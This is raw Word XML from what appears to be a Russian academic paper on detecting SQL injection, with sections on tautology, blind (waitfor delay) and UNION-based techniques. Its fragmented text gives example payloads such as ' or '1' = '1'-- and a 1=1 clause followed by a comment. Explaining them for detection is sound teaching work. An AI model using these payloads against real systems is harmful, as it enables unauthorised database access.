      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</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w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE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 xml:space="preserve">= </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00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --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причем часть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ORDER BY</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 ,будет закомментирована</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и не будет исполняться. Запрос</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 xml:space="preserve">вернёт все </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>стр</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>оки</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из таблицы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Products</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, так как условие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явля</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ется </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>истинным.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7814" w:rsidRPr="003B32C2" w:rsidRDefault="003B7814" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc420429530"/>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0"/>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0"/>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRPr="00291342" w:rsidRDefault="00291342" w:rsidP="00291342">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRPr="00D21A0A" w:rsidRDefault="00291342" w:rsidP="00291342">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc420596237"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Алгоритм выявления возможности внедрения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-кода</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRPr="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00401E79" w:rsidRPr="003B32C2" w:rsidRDefault="00401E79"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Невозможно </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>указать</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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B73CCD">
      <w:pPr>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url либо в теле запроса. Для примера - вот что можно вставить вместо "</w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>":</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E2666F"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8322CE"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rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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p>
    <w:p w:rsidR="008E2951" w:rsidRPr="00C250C0" w:rsidRDefault="00291342" w:rsidP="008E2951">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C250C0" w:rsidRPr="00C250C0" w:rsidRDefault="00291342" w:rsidP="008E2951">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C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00C250C0" w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%)'</w:t>
      </w:r>
      <w:r w:rsidR="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or '1' = '1'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008322CE" w:rsidRPr="00B73CCD" w:rsidRDefault="00DF708C" w:rsidP="00B73CCD">
      <w:pPr>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заменив ключевое слово or на and.</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or</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291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00B73CCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> но также и все остальные. После добавления ключевого слова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and</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and</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291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</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291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</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08117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742A82">
      <w:pPr>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екции с использованием процедуры waitfor delay называются Blind или слепые sql-</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6C445E" w:rsidRDefault="006C445E"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9F0170" w:rsidRDefault="009F0170" w:rsidP="009F0170"/>
    <w:p w:rsidR="00FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00FA7AED">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc420596238"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Алгоритм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 xml:space="preserve">-кода с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>оператора</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRPr="009F0170" w:rsidRDefault="00FA7AED" w:rsidP="009F0170"/>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 xml:space="preserve">о на применении оператора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">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 xml:space="preserve">запросов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w: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w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запроса</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">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Select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, который мы добавляем посредством </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">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FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">было </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>такое же</w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>количество</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращаемых параметров </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> соответствующий</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> тип</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O(log(n)), где n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611C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ограничение </w:t>
      </w:r>
      <w:r w:rsidRPr="00611C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NOT</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="00611C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00611C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL и </w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="00611C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>соотв</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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null или простое значение, наподобие пробела, исмвола,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FC4D17"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165AA1" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00D73001" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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FC4D17"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165AA1" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00D73001" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
